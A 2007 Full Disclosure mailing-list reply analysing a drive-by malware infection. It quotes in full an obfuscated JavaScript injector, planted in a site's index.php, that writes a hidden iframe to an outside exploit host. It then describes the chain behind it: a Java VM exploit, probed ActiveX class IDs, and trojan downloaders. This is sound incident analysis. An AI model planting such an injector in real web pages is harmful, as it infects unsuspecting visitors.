Full Disclosure mailing list archives
Re: any idea what is going on here?
From: Andrew Farmer <andfarm () gmail com>
Date: Thu, 4 Jan 2007 15:25:50 -0800
On 04 Jan 07, at 13:37, Ian Shaw wrote:
A website that I am developing has had BackDoor-CUS!php uploaded to the images directory. My faulty entirely due to permissions set. This has resulted in <html> <script language="javascript"> s=unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A% 2F%2F%77%77%77%2E%6E%6F%77%6E%61%6D%65%73%2E%6F%72%67%2F%69%6D%61% 67%65%73%2F%69%6E%2E%70%68%70%3F%61%64%76%3D%33%22%20%57%49%44%54% 48%3D%22%30%25%22%20%48%45%49%47%48%54%3D%22%30%25%22%20%4D%41%52% 47%49%4E%48%45%49%47%48%54%3D%22%30%22%20%4D%41%52%47%49%4E%57%49% 44%54%48%3D%22%30%22%20%53%43%52%4F%4C%4C%49%4E%47%3D%22%61%75%74%6F %22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%4E%4F%52%45% 53%49%5A%45%3E%3C%2F%69%66%72%61%6D%65%3E%0A"); document.writeln(s);document.close(); </script> </html> being added to the top of index.php. Unencoded this reads iframe src=" http://www.nownames.org/images/in.php?adv=3" WIDTH="0%" HEIGHT="0%" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="auto" frameborder="0" NORESIZE> When I go to this an applet appear to run but I am not sure what doing. Closed my browser out of fear. Does anyone know what it is attempting to do?
The iframe source loads an obfuscated Javascript which, when decoded, loads a Java applet and subsequently attempts several exploits. I have disassembled the Java applet. It contains some obfuscation of its own, defining classes at runtime from inline byte arrays. It appears to exploit the Microsoft Java VM by overloading SecurityClassLoader at runtime. One is against a number of ActiveX plugins which implement CreateObject or GetObject methods which may be used to create a WScriptShell. The class IDs of the plugins in question are: {BD96C556-65A3-11D0-983A-00C04FC29E36} {BD96C556-65A3-11D0-983A-00C04FC29E36} {AB9BCEDD-EC7E-47E1-9322-D4A210617116} {0006F033-0000-0000-C000-000000000046} {0006F03A-0000-0000-C000-000000000046} {6e32070a-766d-4ee6-879c-dc1fa91d2fc3} {6414512B-B978-451D-A0D8-FCFDF33E833C} {7F5B7F63-F06F-4331-8A26-339E03C0AE3D} {06723E09-F4C2-43c8-8358-09FCD1DB0766} {639F725F-1B2D-4831-A9FD-874847682010} {BA018599-1DB3-44f9-83B4-461454C84BF8} {D0C07D56-7C69-43F1-B4A0-25F5A11FAB19} {E8CCCDDF-CA28-496b-B050-6C07C962476B} If such an plugin is found, the script loads and runs a small Windows executable. I have not fully analyzed this executable, but it appears to be a downloader which is not identified by Kapersky. It loads a third executable in MS-DOS format from another site. None of my tools can disassemble this, but Kapersky identifies it as Trojan- Downloader.Win32.Small.avw: *another* loader. Following this, the decrypted script contains part of another exploit. The exploit is truncated, so I'm not sure exactly what it's targeting. There's a lot of Unicode shellcode escaping going on, but the final "attack" is missing. This may be due to a bug in the decryption routine. All files are available on request, if anyone's interested in doing some further analysis of their own. That was fun :) _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- any idea what is going on here? Ian Shaw (Jan 04)
- Re: any idea what is going on here? Andrew Farmer (Jan 04)
- Re: any idea what is going on here? ascii (Jan 04)
- Re: any idea what is going on here? Andrew Farmer (Jan 04)